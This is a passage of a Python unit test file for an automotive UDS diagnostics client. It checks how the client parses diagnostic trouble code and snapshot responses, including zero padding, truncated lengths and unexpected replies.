getattr(self.udsclient, self.client_function).__call__(0x5A)
else:
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
# Since we ignore all-zero DTCs, case number 4 with 4 extra 0 bytes is considered a valid answer, just as if these 0 bytes were not there
def test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
data = '\x59'+self.sb+'\xFB\x12\x34\x56\x20\x12\x34\x57\x60'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
exception_values = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, False, None]
for i in xrange(5):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
if exception_values[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
# Since we consider all 0 DTC, case number 4 with 4 extra 0 bytes is a valid response where DTC ID=0
def test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
data = '\x59'+self.sb+'\xFB\x12\x34\x56\x20\x12\x34\x57\x60'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
exception_values = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, True, None]
for i in xrange(5):
if exception_values[i]:
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
else:
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
# Since we consider all 0 DTC, case number 4 with 4 extra 0 bytes is a valid response where DTC ID=0
def test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
data = '\x59'+self.sb+'\xFB\x12\x34\x56\x20\x12\x34\x57\x60'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
error_values = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, True, None]
for i in xrange(5):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
if error_values[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_no_dtc(self):
self.wait_request_and_respond("\x59"+self.sb+"\xFB")
def _test_no_dtc(self):
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertEqual(len(response.service_data.dtcs), 0)
def test_bad_response_subfunction_exception(self):
self.wait_request_and_respond("\x59"+self.badsb+"\xFB")
def _test_bad_response_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
def test_bad_response_subfunction_no_exception(self):
self.wait_request_and_respond("\x59"+self.badsb+"\xFB")
def _test_bad_response_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond("\x6F"+self.sb+"\xFB")
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond("\x6F"+self.sb+"\xFB")
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_length_exception(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59"+self.sb)
def _test_bad_response_length_exception(self):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(0x5A)
def test_bad_response_length_no_exception(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59"+self.sb)
def _test_bad_response_length_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertFalse(response.valid)
response = getattr(self.udsclient, self.client_function).__call__(0x5A)
self.assertFalse(response.valid)
def test_oob_value(self):
pass
def _test_oob_value(self):
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(0x100)
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(-1)
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(u'aaa')
class TestReportDTCByStatusMask(ClientServerTest, GenericTestStatusMaskRequest_DtcAndStatusMaskResponse): # Subfn = 0x2
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestStatusMaskRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0x2, client_function = u'get_dtc_by_status_mask')
class TestReportDTCSnapshotIdentification(ClientServerTest): # Subfn = 0x3
def client_assert_response(self, response, expect_all_zero_third_dtc=False):
number_of_dtc = 3 if expect_all_zero_third_dtc else 2
self.assertEqual(len(response.service_data.dtcs), number_of_dtc)
self.assertEqual(response.service_data.dtc_count, number_of_dtc)
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(len(response.service_data.dtcs[0].snapshots), 2)
self.assertEqual(response.service_data.dtcs[0].snapshots[0], 1)
self.assertEqual(response.service_data.dtcs[0].snapshots[1], 2)
self.assertEqual(response.service_data.dtcs[1].id, 0x789abc)
self.assertEqual(len(response.service_data.dtcs[1].snapshots), 1)
self.assertEqual(response.service_data.dtcs[1].snapshots[0], 3)
if expect_all_zero_third_dtc:
self.assertEqual(response.service_data.dtcs[2].id, 0)
self.assertEqual(len(response.service_data.dtcs[2].snapshots), 1)
self.assertEqual(response.service_data.dtcs[2].snapshots[0], 0)
def test_normal_behaviour(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x03")
self.conn.fromuserqueue.put("\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03")
def _test_normal_behaviour(self):
response = self.udsclient.get_dtc_snapshot_identification()
self.client_assert_response(response)
def test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
data = '\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = True
for i in xrange(5):
response = self.udsclient.get_dtc_snapshot_identification()
self.client_assert_response(response, expect_all_zero_third_dtc=False)
def test_normal_behaviour_zeropadding_ok_consider_allzero(self):
data = '\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_consider_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = False
expect_all_zero_third_dtc_values = [False, False, False, True, True]
for i in xrange(5):
response = self.udsclient.get_dtc_snapshot_identification()
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
data = '\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
must_return_invalid = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, False, None]
for i in xrange(5):
if must_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_identification()
else:
response = self.udsclient.get_dtc_snapshot_identification()
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
data = '\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
must_return_invalid = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, False, None]
for i in xrange(5):
response = self.udsclient.get_dtc_snapshot_identification()
if must_return_invalid[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
data = '\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
must_return_invalid = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, True, None]
for i in xrange(5):
if must_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_identification()
else:
response = self.udsclient.get_dtc_snapshot_identification()
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
data = '\x59\x03\x12\x34\x56\x01\x12\x34\x56\x02\x78\x9a\xbc\x03'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
must_return_invalid = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, True, None]
for i in xrange(5):
response = self.udsclient.get_dtc_snapshot_identification()
if must_return_invalid[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_no_dtc(self):
self.wait_request_and_respond("\x59\x03")
def _test_no_dtc(self):
response = self.udsclient.get_dtc_snapshot_identification()
self.assertEqual(len(response.service_data.dtcs), 0)
def test_bad_response_subfunction_exception(self):
self.wait_request_and_respond("\x59\x04")
def _test_bad_response_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_identification()
def test_bad_response_subfunction_no_exception(self):
self.wait_request_and_respond("\x59\x04")
def _test_bad_response_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_identification()
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond("\x6F\x03")
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_identification()
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond("\x6F\x03")
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_identification()
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_length_exception(self):
self.wait_request_and_respond('\x59')
self.wait_request_and_respond('\x59\x03\x12')
self.wait_request_and_respond('\x59\x03\x12\x34')
self.wait_request_and_respond('\x59\x03\x12\x34\x56')
self.wait_request_and_respond('\x59\x03\x12\x34\x56\x01\x12')
def _test_bad_response_length_exception(self):
for i in xrange(5):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_identification()
def test_bad_response_length_no_exception(self):
self.wait_request_and_respond('\x59')
self.wait_request_and_respond('\x59\x03\x12')
self.wait_request_and_respond('\x59\x03\x12\x34')
self.wait_request_and_respond('\x59\x03\x12\x34\x56')
self.wait_request_and_respond('\x59\x03\x12\x34\x56\x01\x12')
def _test_bad_response_length_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(5):
response = self.udsclient.get_dtc_snapshot_identification()
self.assertFalse(response.valid)
class TestReportDTCSnapshotRecordByDTCNumber(ClientServerTest): # Subfn = 0x4
class Codec4711(DidCodec):
def encode(self, did_value):
return struct.pack(u'>BBHB', did_value[u'ect'], did_value[u'tp'], did_value[u'rpm'], did_value[u'map'])
def decode(self, did_payload):
v = dict(ect=0, tp=0, rpm=0, map=0)
(v[u'ect'], v[u'tp'], v[u'rpm'], v[u'map']) = struct.unpack(u'>BBHB', did_payload)
return v
def __len__(self):
return 5
class Codec4455(DidCodec):
def encode(self, did_value):
return struct.pack(u'>H', did_value)
def decode(self, did_payload):
return struct.unpack(u'>H', did_payload)[0]
def __len__(self):
return 2
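# Worked decode example for the codecs above: the five snapshot bytes
# b'\xa6\x66\x07\x50\x20' used in the canned responses below unpack with '>BBHB' to
# ect=0xA6, tp=0x66, rpm=0x0750, map=0x20 via Codec4711, which is exactly what
# single_snapshot_assert_response checks.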
def postClientSetUp(self):
self.udsclient.config[u"data_identifiers"] = {
0x4455 : self.__class__.Codec4455,
0x4711 : self.__class__.Codec4711,
0x6789 : u'BBB'
}
def single_snapshot_assert_response(self, response):
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 1)
snapshot = dtc.snapshots[0]
self.assertTrue(isinstance(snapshot, Dtc.Snapshot))
self.assertEqual(snapshot.record_number, 0x02)
self.assertEqual(snapshot.did, 0x4711)
self.assertEqual(dtc.snapshots[0].data[u'ect'], 0xA6) # Engine Coolant Temp
self.assertEqual(dtc.snapshots[0].data[u'tp'], 0x66) # Throttle Position
self.assertEqual(dtc.snapshots[0].data[u'rpm'], 0x750) # Engine speed
self.assertEqual(dtc.snapshots[0].data[u'map'], 0x20) # Manifold Absolute Pressure
def single_snapshot_2_dids_assert_response(self, response):
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 2)
self.assertTrue(isinstance(dtc.snapshots[0], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[0].record_number, 0x02)
self.assertEqual(dtc.snapshots[0].did, 0x4711)
self.assertTrue(isinstance(dtc.snapshots[1], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[1].record_number, 0x02)
self.assertEqual(dtc.snapshots[1].did, 0x6789)
self.assertEqual(dtc.snapshots[0].data[u'ect'], 0xA6) # Engine Coolant Temp
self.assertEqual(dtc.snapshots[0].data[u'tp'], 0x66) # Throttle Position
self.assertEqual(dtc.snapshots[0].data[u'rpm'], 0x750) # Engine speed
self.assertEqual(dtc.snapshots[0].data[u'map'], 0x20) # Manifold Absolute Pressure
self.assertEqual(dtc.snapshots[1].data[0], 0x99)
self.assertEqual(dtc.snapshots[1].data[1], 0x88)
self.assertEqual(dtc.snapshots[1].data[2], 0x77)
def test_single_snapshot(self): # Example provided in standard
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x04\x12\x34\x56\x02")
self.conn.fromuserqueue.put("\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20")
def _test_single_snapshot(self):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=2)
self.single_snapshot_assert_response(response)
def test_single_snapshot_with_instance_param(self): # Example provided in standard
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x04\x12\x34\x56\x02")
self.conn.fromuserqueue.put("\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20")
def _test_single_snapshot_with_instance_param(self):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=Dtc(0x123456), record_number=2)
self.single_snapshot_assert_response(response)
def test_single_snapshot_zeropadding_ok(self): # Example provided in standard
data = '\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20'
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_snapshot_zeropadding_ok(self):
for i in xrange(7):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=2)
self.single_snapshot_assert_response(response)
def test_single_snapshot_zeropadding_notok_exception(self): # Example provided in standard
data = '\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20'
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_snapshot_zeropadding_notok_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
for i in xrange(7):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=2)
def test_single_snapshot_zeropadding_notok_no_exception(self): # Example provided in standard
data = '\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20'
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_snapshot_zeropadding_notok_no_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(7):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=2)
self.assertFalse(response.valid)
def test_single_snapshot_2_did(self): # Example provided in standard
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x04\x12\x34\x56\x02")
self.conn.fromuserqueue.put("\x59\x04\x12\x34\x56\x24\x02\x02\x47\x11\xa6\x66\x07\x50\x20\x67\x89\x99\x88\x77")
def _test_single_snapshot_2_did(self):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=2)
self.single_snapshot_2_dids_assert_response(response)
def test_multiple_snapshot_multiple_did(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x04\x12\x34\x56\xFF")
self.conn.fromuserqueue.put("\x59\x04\x12\x34\x56\x24\x02\x02\x47\x11\xa6\x66\x07\x50\x20\x67\x89\x99\x88\x77\x03\x01\x44\x55\x43\x21")
def _test_multiple_snapshot_multiple_did(self):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0xFF)
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 3)
self.assertTrue(isinstance(dtc.snapshots[0], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[0].record_number, 0x02)
self.assertEqual(dtc.snapshots[0].did, 0x4711)
self.assertTrue(isinstance(dtc.snapshots[1], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[1].record_number, 0x02)
self.assertEqual(dtc.snapshots[1].did, 0x6789)
self.assertTrue(isinstance(dtc.snapshots[2], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[2].record_number, 0x03)
self.assertEqual(dtc.snapshots[2].did, 0x4455)
# data
self.assertEqual(dtc.snapshots[0].data[u'ect'], 0xA6) # Engine Coolant Temp
self.assertEqual(dtc.snapshots[0].data[u'tp'], 0x66) # Throttle Position
self.assertEqual(dtc.snapshots[0].data[u'rpm'], 0x750) # Engine speed
self.assertEqual(dtc.snapshots[0].data[u'map'], 0x20) # Manifold Absolute Pressure
self.assertEqual(dtc.snapshots[1].data[0], 0x99)
self.assertEqual(dtc.snapshots[1].data[1], 0x88)
self.assertEqual(dtc.snapshots[1].data[2], 0x77)
self.assertEqual(dtc.snapshots[2].data, 0x4321)
def test_invalid_length_incomplete_dtc_exception(self):
self.wait_request_and_respond('\x59\x04\x12')
self.wait_request_and_respond('\x59\x04\x12\x34')
def _test_invalid_length_incomplete_dtc_exception(self):
for i in xrange(2):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_invalid_length_incomplete_dtc_no_exception(self):
self.wait_request_and_respond('\x59\x04\x12')
self.wait_request_and_respond('\x59\x04\x12\x34')
def _test_invalid_length_incomplete_dtc_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(2):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertFalse(response.valid)
def test_invalid_length_missing_status_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56')
def _test_invalid_length_missing_status_exception(self):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_invalid_length_missing_status_no_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56')
def _test_invalid_length_missing_status_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertFalse(response.valid)
def test_invalid_length_missing_identifier_number_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03')
def _test_invalid_length_missing_identifier_number_exception(self):
for i in xrange(2):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_invalid_length_missing_identifier_number_no_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03')
def _test_invalid_length_missing_identifier_number_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(2):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertFalse(response.valid)
def invalid_length_missing_did_server_task(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x01')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x01\x67')
def test_invalid_length_missing_did_exception(self):
self.invalid_length_missing_did_server_task()
def _test_invalid_length_missing_did_exception(self):
for i in xrange(4):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0xFF)
def test_invalid_length_missing_did_no_exception(self):
self.invalid_length_missing_did_server_task()
def _test_invalid_length_missing_did_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(4):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0xFF)
self.assertFalse(response.valid)
def invalid_length_missing_data_server_task(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x01\x67\x89')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x01\x67\x89\x99')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x01\x67\x89\x99\x88')
def test_invalid_length_missing_data_exception(self):
self.invalid_length_missing_data_server_task()
def _test_invalid_length_missing_data_exception(self):
for i in xrange(9):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0xff)
def test_invalid_length_missing_data_no_exception(self):
self.invalid_length_missing_data_server_task()
def _test_invalid_length_missing_data_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(9):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0xff)
self.assertFalse(response.valid)
def test_bad_subfunction_exception(self):
self.wait_request_and_respond('\x59\x05\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_bad_subfunction_no_exception(self):
self.wait_request_and_respond('\x59\x05\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_dtc_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x57\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_dtc_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_bad_dtc_no_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x57\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_dtc_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_record_number_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x03\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_record_number_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_bad_record_number_no_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x03\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_record_number_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_no_record(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24')
def _test_no_record(self):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 0)
def test_no_record_zero_padding_ok(self):
data = '\x59\x04\x12\x34\x56\x24'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_no_record_zero_padding_ok(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(8):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 0)
def test_no_record_zero_padding_not_ok_exception(self):
data = '\x59\x04\x12\x34\x56\x24'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_no_record_zero_padding_not_ok_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
for i in xrange(8):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_no_record_zero_padding_not_ok_no_exception(self):
data = '\x59\x04\x12\x34\x56\x24'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_no_record_zero_padding_not_ok_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
